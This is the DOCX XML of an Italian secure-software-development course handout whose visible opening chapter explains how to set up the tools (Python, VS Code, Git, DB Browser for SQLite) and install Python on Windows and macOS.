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Sviluppo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sicuro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Software</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dispensa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Completa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Primo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Anno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ITS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ing.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Alessandro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Manneschi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Date"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Formativo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2024/2025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7" w:name="capitolo-0-preparare-lambiente-di-lavoro"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="438" w:name="ch_0"/>
      <w:r>
        <w:t xml:space="preserve">Capitolo 0 — Preparare l’ambiente di lavoro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="438"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa devi sapere prima di leggere questo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nulla. Si parte dal computer appena acceso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Quanto ci vorrà:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se segui tutto la prima volta, da 60 a 90 minuti. Successivamente, riaprire l’ambiente è questione di secondi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questo capitolo non parla di sicurezza. Parla di come preparare il tuo computer per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">fare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sicurezza nei capitoli successivi. Salta questo passaggio e troverai tutti gli altri capitoli incomprensibili: i comandi non funzioneranno, gli esempi non gireranno, e penserai che il problema sia il tuo. Non lo sarà — sarà l’ambiente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Segui in ordine. Non saltare passaggi. Quando un comando produce un errore inatteso,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">leggi l’errore prima di chiedere aiuto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: nove volte su dieci ti dice già cosa è andato storto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="20" w:name="cosa-stai-per-installare-e-perché"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="439" w:name="sec_0_1"/>
      <w:r>
        <w:t xml:space="preserve">0.1 Cosa stai per installare, e perché</w:t>
      </w:r>
      <w:bookmarkEnd w:id="439"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per tutto il corso ci serviranno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cinque strumenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Te li elenco subito così sai dove stiamo andando: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Strumento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A cosa serve</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Python 3.12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Il linguaggio di programmazione che useremo per scrivere tutto il codice e tutti gli esempi.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Visual Studio Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">L’editor di testo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">intelligente</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">dove scriverai il codice. È gratuito, di Microsoft, multipiattaforma.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Git</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lo strumento che useremo per scaricare l’applicazione di esempio</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">BancaPiccola</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">dal repository del corso.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">DB Browser for SQLite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Un programma con interfaccia grafica per</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">sbirciare</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">dentro il database della nostra applicazione.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Un browser moderno</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Probabilmente già lo hai. Useremo Chrome, Edge o Firefox: tutti vanno bene.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I primi quattro vanno installati. Procediamo uno alla volta, con verifica al termine di ogni installazione.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="25" w:name="installare-python"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="440" w:name="sec_0_2"/>
      <w:r>
        <w:t xml:space="preserve">0.2 Installare Python</w:t>
      </w:r>
      <w:bookmarkEnd w:id="440"/>
    </w:p>
    <w:bookmarkStart w:id="21" w:name="cosè-python-e-perché-lo-installiamo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cos’è Python e perché lo installiamo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è un linguaggio di programmazione: un insieme di regole e parole chiave con cui possiamo scrivere istruzioni che il computer eseguirà. A differenza di altri linguaggi (C, C++, Java), il codice Python non viene</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">compilato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in un file eseguibile separato: viene letto e interpretato riga per riga da un programma chiamato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">interprete Python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Quindi quando installi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, in realtà stai installando l’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">interprete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Useremo la versione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">3.12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o successiva. La versione 2 di Python è obsoleta dal 2020 — se trovi guide su internet che usano</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">print "ciao"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(senza parentesi), stanno parlando di Python 2, ignoralo.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="22" w:name="installazione-su-windows"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Installazione su Windows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">📷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la pagina di download di python.org con il pulsante giallo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Download Python 3.12.x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">evidenziato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5669280" cy="3077609"/>
            <wp:docPr id="1" name="Picture 1"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="screenshot_01_la_pagina_di_download_di_python_org_con_il_pulsante_giallo_D.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3077609"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri il browser e vai a:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId28">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.python.org/downloads/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Clicca sul pulsante giallo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Download Python 3.12.x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(la x è un numero che cambia nel tempo — qualunque versione 3.12 o successiva va bene).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Si scaricherà un file chiamato qualcosa tipo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python-3.12.x-amd64.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Aprilo facendo doppio click.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Si aprirà la finestra di installazione.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Prima di cliccare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Install Now</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">DEVI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mettere la spunta in basso su una casella fondamentale:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Add python.exe to PATH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Senza questa spunta, il sistema operativo non saprà dove trovare Python quando lo chiamerai dal terminale, e dovrai disinstallare e ripetere tutto. È l’errore più comune.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Mettere la spunta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">📷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la prima schermata dell’installer Python con la casella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Add python.exe to PATH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cerchiata in rosso e il pulsante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Install Now</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sotto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5669280" cy="3710801"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="screenshot_02_la_prima_schermata_dell_installer_Python_con_la_casella_Add.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3710801"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso clicca</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Install Now</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. L’installazione dura 1-3 minuti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando vedi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Setup was successful</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, clicca</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23" w:name="installazione-su-macos"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Installazione su macOS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vai a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId29">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.python.org/downloads/macos/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
